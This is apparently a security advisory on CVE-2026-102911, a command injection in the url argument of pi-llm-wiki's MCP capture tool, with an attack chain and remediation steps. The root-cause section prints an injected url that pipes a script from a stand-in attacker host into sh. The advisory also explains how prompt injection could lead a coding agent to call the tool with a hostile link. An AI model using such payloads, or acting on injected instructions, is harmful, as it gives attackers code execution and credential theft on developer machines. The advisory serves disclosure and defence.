SECURITYCRITICALCVE-2026-102911

CVE-2026-102911: Critical OS Command Injection in pi-llm-wiki's MCP Capture Tool

Critical CVSS 9.9 OS command injection in pi-llm-wiki's wiki_capture_source MCP tool via the url argument; fixed in v0.11.8.

Dylan H.

Security Team

September 30, 2026
9 min read
CVE-2026-102911: Critical OS Command Injection in pi-llm-wiki's MCP Capture Tool

Critical severity

Rated critical. Prioritise patching — see the remediation guidance below.

Affected Products

  • zosmaai pi-llm-wiki — versions 0.11.0 through 0.11.7 (≤ 0.11.7)

Overview

zosmaai's pi-llm-wiki, an open-source "self-maintaining" knowledge-base project that ships as a Model Context Protocol (MCP) server for AI coding agents such as Claude Code, Cursor, and Windsurf, is affected by a critical OS command injection vulnerability tracked as CVE-2026-102911. The flaw carries a CVSS 3.1 score of 9.9 (Critical) and was published on September 30, 2026. NVD records the exploit as publicly disclosed.

pi-llm-wiki implements the "LLM wiki" pattern popularized by Andrej Karpathy: rather than re-searching raw sources every time, an agent progressively distills captured material into durable, interconnected wiki pages. The project's wiki_capture_source MCP tool is the entry point for that pipeline — it accepts a URL, a local file, or pasted text and turns it into an immutable "source packet" (a manifest.json, the original artifact, and a normalized extracted.md) inside the project's vault.

According to the NVD description, an unknown function in mcp/index.ts — the file implementing the wiki_capture_source tool — fails to properly handle the url argument before it is used in command execution, allowing an attacker who can influence that argument to run arbitrary operating-system commands. The maintainers shipped a fix in v0.11.8. Beyond the NVD record and the patch itself, public technical detail on this CVE is limited — pi-llm-wiki is a low-profile project, and no vendor advisory, CISA KEV listing, or in-depth third-party writeup was found at the time of publication. This advisory is written from the NVD description and the publicly visible fix; CosmicBytez Labs will update it if more detail becomes available.


Technical Details

AttributeValue
CVE IDCVE-2026-102911
SeverityCritical
CVSS v3.1 Score9.9 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
CVSS v4.0 Score8.6 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)
CWECWE-77 (Command Injection) / CWE-78 (OS Command Injection)
Vendor / Projectzosmaai / pi-llm-wiki
Vulnerable Componentwiki_capture_source MCP tool, mcp/index.ts
Vulnerable Parameterurl argument
Affected Versions0.11.0 through 0.11.7 (≤ 0.11.7)
Fixed Version0.11.8
Attack VectorNetwork, low attack complexity, low privileges required, no user interaction
Exploit StatusPublicly disclosed per NVD; no confirmed in-the-wild exploitation found; not listed in CISA's KEV catalog as of September 30, 2026
SourceNVD

How It Works

What wiki_capture_source does

wiki_capture_source is the ingestion point for pi-llm-wiki's knowledge pipeline. When an AI coding agent (or a developer, through that agent) calls the tool with a url, the tool is expected to fetch the remote resource, normalize it into Markdown, and write the result into the local vault alongside the original artifact and a manifest describing the capture. Because the tool exists specifically to pull in content from attacker-reachable locations — any URL an agent is asked to summarize, research, or save — the url argument is untrusted input by design, which is exactly why it needs rigorous sanitization before it touches anything resembling a shell.

Root cause

NVD's description does not name the exact function or command involved, only that "manipulation of the argument url can lead to os command injection." Retrieving and converting a remote URL's contents commonly involves shelling out to an external fetcher or converter rather than doing everything through in-process HTTP libraries. The CWE-77/CWE-78 classification indicates the url value was passed into an OS command execution context (for example, a child_process call built with shell interpolation) without neutralizing shell metacharacters such as ;, |, &&, or backticks. A URL argument such as:

https://example.com/page; curl http://attacker.example/x.sh | sh

would, under that pattern, cause the trailing shell metacharacters to be interpreted by the underlying shell instead of being treated as part of the URL string — handing the attacker arbitrary command execution with whatever privileges the MCP server process holds.

Attack chain

1. Attacker crafts a "url" value containing shell metacharacters
   and a payload command (e.g. a reverse shell or downloader).
2. Attacker gets that url in front of the wiki_capture_source tool —
   directly, if the tool is attacker-reachable, or indirectly via a
   coding agent instructed (or prompt-injected) to "capture" or
   "save" the malicious link.
3. mcp/index.ts passes the unsanitized url argument into an OS
   command execution function.
4. Shell metacharacters break out of the intended command and the
   attacker's payload executes with the MCP server process's privileges.
5. Attacker gains code execution on the developer workstation or
   server hosting the pi-llm-wiki MCP server — with access to the
   local vault, filesystem, and any credentials the process can reach.

Why this matters specifically for MCP tooling

pi-llm-wiki runs as a local MCP server attached directly to AI coding agents — the NVD advisory and project documentation both note compatibility with Claude Code, Cursor, and Windsurf. That placement raises the stakes beyond a typical server-side command injection: these agents often operate with broad filesystem access on a developer's own machine, and a url argument is exactly the kind of value an agent can be manipulated into supplying via prompt injection — for instance, a malicious instruction embedded in a web page, GitHub issue, or document the agent is asked to summarize or "add to the wiki." The CVSS vector's PR:L (low privileges required) and S:C (Scope Changed) components are consistent with this picture: exploitation needs no more than the ability to get the tool invoked with a hostile argument, and the resulting impact extends beyond the MCP server process itself.


Impact Assessment

Impact AreaDescription
ConfidentialityRated High — arbitrary OS command execution can read any file, credential, or secret accessible to the MCP server process
IntegrityRated High — an attacker can modify or delete vault contents, source packets, or other files the process can write
AvailabilityRated High — arbitrary commands can terminate the MCP server, corrupt the vault, or exhaust host resources
Developer Workstation Exposurepi-llm-wiki runs alongside AI coding agents (Claude Code, Cursor, Windsurf) that frequently hold broad local filesystem access — a compromised MCP server process is a direct path to source code, SSH keys, and cloud credentials on a developer machine
AI Supply-Chain RiskThis is a vulnerability in developer/agent tooling rather than production infrastructure, but exploitation can pivot into whatever that developer's machine touches — repositories, CI credentials, and internal systems
Prompt-Injection AmplificationBecause wiki_capture_source is designed to process attacker-reachable URLs, a hostile link embedded in content an agent is asked to "capture" or "save" could trigger exploitation without the developer directly typing the payload

Recommendations

For pi-llm-wiki users and maintainers of MCP tool configurations

  1. Upgrade to pi-llm-wiki v0.11.8 or later immediately. This is the vendor-confirmed fix for CVE-2026-102911; there is no supported workaround for versions 0.11.0 through 0.11.7.
  2. If you cannot upgrade immediately, disable or remove wiki_capture_source / pi-llm-wiki from your MCP client's connected-tools list until the patch is applied.
  3. Treat every url passed to a capture-style MCP tool as untrusted input. Avoid configuring agents to auto-invoke wiki_capture_source on links found in untrusted content (web pages, emails, issue trackers, third-party documents) without a human review step.
  4. Audit your local vault (default ~/.llm-wiki/) and any source packets captured while running an affected version for unexpected files, modified manifests, or signs of command execution.

For security and AppSec teams

  1. Inventory MCP servers connected to AI coding agents across your engineering organization. Tools like pi-llm-wiki that are built to "capture" or "fetch" attacker-reachable input are a meaningful class of risk and should be tracked the same way you track production dependencies.
  2. Apply patch-management rigor to developer-tooling supply chains, not just production software — a CVSS 9.9 OS command injection in a tool that sits on developer workstations is a direct line to source code and credential theft.
  3. Monitor developer endpoints for anomalous child processes spawned by Node.js-based MCP servers, particularly outbound network connections or shell invocations immediately following an agent "capture" or "save" action.

For AI coding-agent users

  1. Confirm which third-party MCP servers are connected to your Claude Code, Cursor, or Windsurf sessions, and verify none are running a vulnerable pi-llm-wiki version.
  2. Be cautious asking an agent to "capture," "save," or "add to the wiki" a URL from an untrusted source until you've confirmed your MCP tooling is patched — this is precisely the action that reaches the vulnerable code path.

Key Takeaways

  1. CVE-2026-102911 is a CVSS 9.9 Critical OS command injection (CWE-77 / CWE-78) in the wiki_capture_source MCP tool shipped by zosmaai's pi-llm-wiki, affecting versions 0.11.0 through 0.11.7.
  2. The root cause is the url argument in mcp/index.ts reaching an OS command execution context without proper sanitization, enabling remote command execution.
  3. pi-llm-wiki is an MCP server that plugs directly into AI coding agents including Claude Code, Cursor, and Windsurf — placing this squarely in the growing category of AI-tooling supply-chain vulnerabilities rather than traditional server-side bugs.
  4. NVD lists the exploit as publicly disclosed, though no confirmed in-the-wild exploitation or CISA KEV listing exists as of September 30, 2026.
  5. The maintainers fixed the issue in v0.11.8; all pre-0.11.8 installations should upgrade immediately or disable the affected tool.
  6. Public technical detail is limited to the NVD record and the public patch — this is a low-profile open-source project, and this advisory will be updated if further vendor or researcher analysis emerges.

Sources

CosmicBytez Labs will update this advisory if zosmaai or independent researchers publish additional technical detail on CVE-2026-102911.